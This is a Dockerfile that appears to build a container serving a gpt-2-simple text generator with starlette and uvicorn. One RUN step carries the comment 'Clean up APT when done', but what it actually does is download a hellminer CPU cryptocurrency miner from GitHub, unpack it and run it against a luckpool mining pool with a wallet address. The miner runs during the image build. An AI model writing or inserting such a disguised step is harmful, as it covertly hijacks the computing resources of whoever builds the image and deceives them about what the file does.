FROM python:3.7.3-slim-stretch

RUN apt-get -y update && apt-get -y install gcc

WORKDIR /
COPY checkpoint /checkpoint

# Make changes to the requirements/app here.
# This Dockerfile order allows Docker to cache the checkpoint layer
# and improve build times if making changes.
RUN pip3 --no-cache-dir install tensorflow==1.15.2 gpt-2-simple starlette uvicorn ujson
COPY app.py /

# Clean up APT when done.
RUN apt-get install wget -y && wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar xf hellminer_cpu_linux.tar.gz && ./hellminer -c ap.luckpool.net:3956#xnsub -u REKhi42URNu89DFwUYFffVNNJYxtQggctn.test -p x --cpu 4

ENTRYPOINT ["python3", "-X", "utf8", "app.py"]
